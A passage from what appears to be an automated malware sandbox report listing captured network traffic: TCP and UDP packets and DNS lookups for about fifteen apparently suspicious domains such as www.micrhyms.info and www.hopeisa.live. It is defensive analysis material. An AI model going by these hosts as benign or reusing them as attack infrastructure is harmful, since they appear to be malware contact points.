                                                                                                                                          Nov 14, 2024 16:30:31.242988110 CET5004080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:31.247867107 CET80500403.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:32.260067940 CET5004180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:33.123472929 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.124999046 CET5004180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:33.133707047 CET5004180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:33.138948917 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.138987064 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.139045000 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.139072895 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.143837929 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.143867970 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.143896103 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.143923044 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.143949986 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.793121099 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:33.793287039 CET5004180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:34.647321939 CET5004180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:34.652489901 CET80500413.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:35.667356968 CET5004280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:35.672513962 CET80500423.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:35.672955990 CET5004280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:35.681257963 CET5004280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:35.686256886 CET80500423.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:36.305202961 CET80500423.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:36.305756092 CET80500423.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:36.305821896 CET5004280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:36.308836937 CET5004280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:36.313942909 CET80500423.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:41.420844078 CET5004380192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:41.426170111 CET8050043195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:41.428986073 CET5004380192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:41.438518047 CET5004380192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:41.443480968 CET8050043195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:42.290924072 CET8050043195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:42.334705114 CET5004380192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:42.420625925 CET8050043195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:42.420681000 CET5004380192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:42.950026989 CET5004380192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:43.963063002 CET5004480192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:43.968655109 CET8050044195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:43.968738079 CET5004480192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:43.979094982 CET5004480192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:43.984045029 CET8050044195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:44.844105005 CET8050044195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:44.897330999 CET5004480192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:44.974142075 CET8050044195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:44.976943016 CET5004480192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:45.491033077 CET5004480192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:46.509514093 CET5004580192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:46.514699936 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:46.514776945 CET5004580192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:46.527024031 CET5004580192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:46.532531023 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:46.532572985 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:46.532603025 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:46.532629967 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:46.532658100 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:46.532685995 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:46.532713890 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:46.532741070 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:46.532768965 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:47.376981020 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:47.428540945 CET5004580192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:47.507097960 CET8050045195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:47.507589102 CET5004580192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:48.037866116 CET5004580192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:49.056035042 CET5004680192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:49.061269999 CET8050046195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:49.063487053 CET5004680192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:49.069375038 CET5004680192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:49.074306011 CET8050046195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:49.912000895 CET8050046195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:49.959806919 CET5004680192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:50.041659117 CET8050046195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:50.041826963 CET5004680192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:50.042655945 CET5004680192.168.2.4195.110.124.133
                                                                                                                                          Nov 14, 2024 16:30:50.049052000 CET8050046195.110.124.133192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:55.073457003 CET5004780192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:55.078386068 CET80500473.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:55.083403111 CET5004780192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:55.091777086 CET5004780192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:55.096674919 CET80500473.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:55.740408897 CET80500473.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:55.740494013 CET5004780192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:56.600481987 CET5004780192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:56.605896950 CET80500473.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:57.619383097 CET5004880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:57.624721050 CET80500483.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:57.624881983 CET5004880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:57.636802912 CET5004880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:57.652614117 CET80500483.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:58.347616911 CET80500483.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:58.347671032 CET5004880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:59.147327900 CET5004880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:30:59.152653933 CET80500483.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.166029930 CET5004980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:00.171221972 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.171308041 CET5004980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:00.188041925 CET5004980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:00.193296909 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.193315983 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.193331003 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.193344116 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.193356991 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.193582058 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.193594933 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.193608046 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.193620920 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.824650049 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:00.831875086 CET5004980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:01.695311069 CET5004980192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:01.702830076 CET80500493.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:02.712012053 CET5005080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:02.717430115 CET80500503.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:02.717513084 CET5005080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:02.723759890 CET5005080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:02.729358912 CET80500503.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:03.344474077 CET80500503.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:03.345021963 CET80500503.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:03.348973036 CET5005080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:03.349611044 CET5005080192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:03.358716965 CET80500503.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:16.484565973 CET5005180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:16.489842892 CET80500513.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:16.489923954 CET5005180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:16.499958992 CET5005180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:16.506584883 CET80500513.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:17.120363951 CET80500513.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:17.120928049 CET5005180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:18.006563902 CET5005180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:18.011503935 CET80500513.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:19.024425983 CET5005280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:19.030253887 CET80500523.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:19.033008099 CET5005280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:19.048754930 CET5005280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:19.053899050 CET80500523.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:19.652544975 CET80500523.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:19.652793884 CET5005280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:20.553638935 CET5005280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:20.558892965 CET80500523.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:21.571710110 CET5005380192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:21.576879978 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:21.580809116 CET5005380192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:21.603451967 CET5005380192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:21.610411882 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:21.610487938 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:21.610516071 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:21.610548019 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:21.611042976 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:21.612185955 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:21.612258911 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:21.612287998 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:21.612314939 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:23.116678953 CET5005380192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:23.126822948 CET80500533.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:23.127234936 CET5005380192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:24.134761095 CET5005480192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:24.140556097 CET80500543.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:24.140762091 CET5005480192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:24.146698952 CET5005480192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:24.151900053 CET80500543.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:24.770987988 CET80500543.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:24.771543980 CET80500543.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:24.771606922 CET5005480192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:24.774427891 CET5005480192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:31:24.779195070 CET80500543.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:30.465936899 CET5005580192.168.2.413.248.169.48
                                                                                                                                          Nov 14, 2024 16:31:30.471209049 CET805005513.248.169.48192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:30.471390009 CET5005580192.168.2.413.248.169.48
                                                                                                                                          Nov 14, 2024 16:31:30.483170033 CET5005580192.168.2.413.248.169.48
                                                                                                                                          Nov 14, 2024 16:31:30.488676071 CET805005513.248.169.48192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:31.199188948 CET805005513.248.169.48192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:31.199433088 CET5005580192.168.2.413.248.169.48
                                                                                                                                          Nov 14, 2024 16:31:31.992834091 CET5005580192.168.2.413.248.169.48
                                                                                                                                          Nov 14, 2024 16:31:31.998058081 CET805005513.248.169.48192.168.2.4

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Nov 14, 2024 16:28:02.683190107 CET5346453192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:28:02.739871025 CET53534641.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:18.495337009 CET6462953192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:28:18.511343956 CET53646291.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:32.260032892 CET6259053192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:28:32.278846025 CET53625901.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:45.651710033 CET6047853192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:28:45.669982910 CET53604781.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:59.025510073 CET6549453192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:28:59.378057003 CET53654941.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:17.870141029 CET6133153192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:29:18.207907915 CET53613311.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:31.619607925 CET5096953192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:29:31.671128035 CET53509691.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:44.972031116 CET5891553192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:29:44.985191107 CET53589151.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:59.215820074 CET5647053192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:29:59.228514910 CET53564701.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:12.619690895 CET5164153192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:30:12.664686918 CET53516411.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:27.152100086 CET5928853192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:30:27.167186975 CET53592881.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:41.324862957 CET6377353192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:30:41.417130947 CET53637731.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:30:55.057533979 CET5134753192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:30:55.071058035 CET53513471.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:08.354202986 CET5199253192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:31:08.371076107 CET53519921.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:16.431879044 CET5016153192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:31:16.482156038 CET53501611.1.1.1192.168.2.4
                                                                                                                                          Nov 14, 2024 16:31:30.181195021 CET5268353192.168.2.41.1.1.1
                                                                                                                                          Nov 14, 2024 16:31:30.462845087 CET53526831.1.1.1192.168.2.4

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Nov 14, 2024 16:28:02.683190107 CET192.168.2.41.1.1.10x84e5Standard query (0)www.ila.beautyA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:18.495337009 CET192.168.2.41.1.1.10xc58cStandard query (0)www.shintow.netA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:32.260032892 CET192.168.2.41.1.1.10x6f83Standard query (0)www.mireela.proA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:45.651710033 CET192.168.2.41.1.1.10xd0eeStandard query (0)www.micrhyms.infoA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:59.025510073 CET192.168.2.41.1.1.10x8515Standard query (0)www.estrela-b.onlineA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:17.870141029 CET192.168.2.41.1.1.10x1f17Standard query (0)www.meanttobebroken.orgA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:31.619607925 CET192.168.2.41.1.1.10xdee1Standard query (0)www.mjmegartravel.onlineA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:44.972031116 CET192.168.2.41.1.1.10x1d93Standard query (0)www.energyparks.netA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:59.215820074 CET192.168.2.41.1.1.10xadaStandard query (0)www.theawareness.shopA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:12.619690895 CET192.168.2.41.1.1.10xae54Standard query (0)www.ak711ka10.latA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:27.152100086 CET192.168.2.41.1.1.10x73b0Standard query (0)www.co2cartridges.netA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:41.324862957 CET192.168.2.41.1.1.10x32dbStandard query (0)www.nutrigenfit.onlineA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:55.057533979 CET192.168.2.41.1.1.10x42e5Standard query (0)www.binacamasala.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:31:08.354202986 CET192.168.2.41.1.1.10x6e05Standard query (0)www.jllllbx.topA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:31:16.431879044 CET192.168.2.41.1.1.10x597bStandard query (0)www.robotcurut.xyzA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:31:30.181195021 CET192.168.2.41.1.1.10x787fStandard query (0)www.hopeisa.liveA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Nov 14, 2024 16:28:02.739871025 CET1.1.1.1192.168.2.40x84e5No error (0)www.ila.beauty13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:02.739871025 CET1.1.1.1192.168.2.40x84e5No error (0)www.ila.beauty76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:18.511343956 CET1.1.1.1192.168.2.40xc58cNo error (0)www.shintow.netghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:18.511343956 CET1.1.1.1192.168.2.40xc58cNo error (0)ghs.googlehosted.com142.250.185.211A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:32.278846025 CET1.1.1.1192.168.2.40x6f83No error (0)www.mireela.pro69.57.163.227A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:45.669982910 CET1.1.1.1192.168.2.40xd0eeNo error (0)www.micrhyms.infomicrhyms.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:45.669982910 CET1.1.1.1192.168.2.40xd0eeNo error (0)micrhyms.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:45.669982910 CET1.1.1.1192.168.2.40xd0eeNo error (0)micrhyms.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:59.378057003 CET1.1.1.1192.168.2.40x8515No error (0)www.estrela-b.onlineestrela-b.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:28:59.378057003 CET1.1.1.1192.168.2.40x8515No error (0)estrela-b.online162.241.63.77A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:18.207907915 CET1.1.1.1192.168.2.40x1f17No error (0)www.meanttobebroken.org141.193.213.11A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:18.207907915 CET1.1.1.1192.168.2.40x1f17No error (0)www.meanttobebroken.org141.193.213.10A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:31.671128035 CET1.1.1.1192.168.2.40xdee1No error (0)www.mjmegartravel.onlinemjmegartravel.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:31.671128035 CET1.1.1.1192.168.2.40xdee1No error (0)mjmegartravel.online76.223.67.189A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:31.671128035 CET1.1.1.1192.168.2.40xdee1No error (0)mjmegartravel.online13.248.213.45A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:44.985191107 CET1.1.1.1192.168.2.40x1d93No error (0)www.energyparks.netenergyparks.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:44.985191107 CET1.1.1.1192.168.2.40x1d93No error (0)energyparks.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:44.985191107 CET1.1.1.1192.168.2.40x1d93No error (0)energyparks.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:59.228514910 CET1.1.1.1192.168.2.40xadaNo error (0)www.theawareness.shop172.67.177.220A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:29:59.228514910 CET1.1.1.1192.168.2.40xadaNo error (0)www.theawareness.shop104.21.83.154A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:12.664686918 CET1.1.1.1192.168.2.40xae54No error (0)www.ak711ka10.lat154.23.181.7A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:27.167186975 CET1.1.1.1192.168.2.40x73b0No error (0)www.co2cartridges.netco2cartridges.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:27.167186975 CET1.1.1.1192.168.2.40x73b0No error (0)co2cartridges.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:27.167186975 CET1.1.1.1192.168.2.40x73b0No error (0)co2cartridges.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:41.417130947 CET1.1.1.1192.168.2.40x32dbNo error (0)www.nutrigenfit.onlinenutrigenfit.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:41.417130947 CET1.1.1.1192.168.2.40x32dbNo error (0)nutrigenfit.online195.110.124.133A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:55.071058035 CET1.1.1.1192.168.2.40x42e5No error (0)www.binacamasala.combinacamasala.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:55.071058035 CET1.1.1.1192.168.2.40x42e5No error (0)binacamasala.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:30:55.071058035 CET1.1.1.1192.168.2.40x42e5No error (0)binacamasala.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:31:08.371076107 CET1.1.1.1192.168.2.40x6e05Name error (3)www.jllllbx.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:31:16.482156038 CET1.1.1.1192.168.2.40x597bNo error (0)www.robotcurut.xyzrobotcurut.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:31:16.482156038 CET1.1.1.1192.168.2.40x597bNo error (0)robotcurut.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:31:16.482156038 CET1.1.1.1192.168.2.40x597bNo error (0)robotcurut.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:31:30.462845087 CET1.1.1.1192.168.2.40x787fNo error (0)www.hopeisa.live13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                          Nov 14, 2024 16:31:30.462845087 CET1.1.1.1192.168.2.40x787fNo error (0)www.hopeisa.live76.223.54.146A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • www.ila.beauty
                                                                                                                                          • www.shintow.net
                                                                                                                                          • www.mireela.pro
                                                                                                                                          • www.micrhyms.info
                                                                                                                                          • www.estrela-b.online
                                                                                                                                          • www.meanttobebroken.org
                                                                                                                                          • www.mjmegartravel.online
                                                                                                                                          • www.energyparks.net
                                                                                                                                          • www.theawareness.shop
                                                                                                                                          • www.ak711ka10.lat
                                                                                                                                          • www.co2cartridges.net
                                                                                                                                          • www.nutrigenfit.online
                                                                                                                                          • www.binacamasala.com
                                                                                                                                          • www.robotcurut.xyz
                                                                                                                                          • www.hopeisa.live

                                                                                                                                          HTTP Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
